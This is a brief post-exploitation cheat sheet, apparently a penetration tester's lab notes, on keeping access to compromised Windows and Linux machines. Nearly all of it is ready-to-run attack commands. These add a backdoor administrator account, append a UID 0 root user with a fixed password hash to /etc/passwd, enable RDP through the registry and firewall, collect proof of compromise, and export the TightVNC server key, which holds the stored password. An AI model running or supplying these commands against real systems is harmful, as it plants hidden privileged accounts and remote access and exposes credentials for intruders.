Notes - Maintaining Access
Create new user
// windows
# net user fm pass123 /add && net localgroup administrators fm /add
// linux
// Generate password hash
# openssl passwd -1 -salt fm pass123
// Add to /etc/passwd
# echo 'fm:$1$fm$zVnrpoW2JQO5YUrLmAs.o1:0:0:root:/root:/bin/bash' >> /etc/passwd
// If running a script
# echo 'echo "fm:\$1\$fm\$zVnrpoW2JQO5YUrLmAs.o1:0:0:root:/root:/bin/bash" >> /etc/passwd' > script.sh
Enable RDP
// powershell
# Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -Value 0
# Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
# Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
// cmd
# reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Proof
- Collect proof of compromise
# hostname && id && cat proof.txt && ip a
# hostname && whoami && type proof.txt && ipconfig /all
TightVNC registry export (server settings key)
reg export "HKLM\Software\TightVNC\Server" foo.reg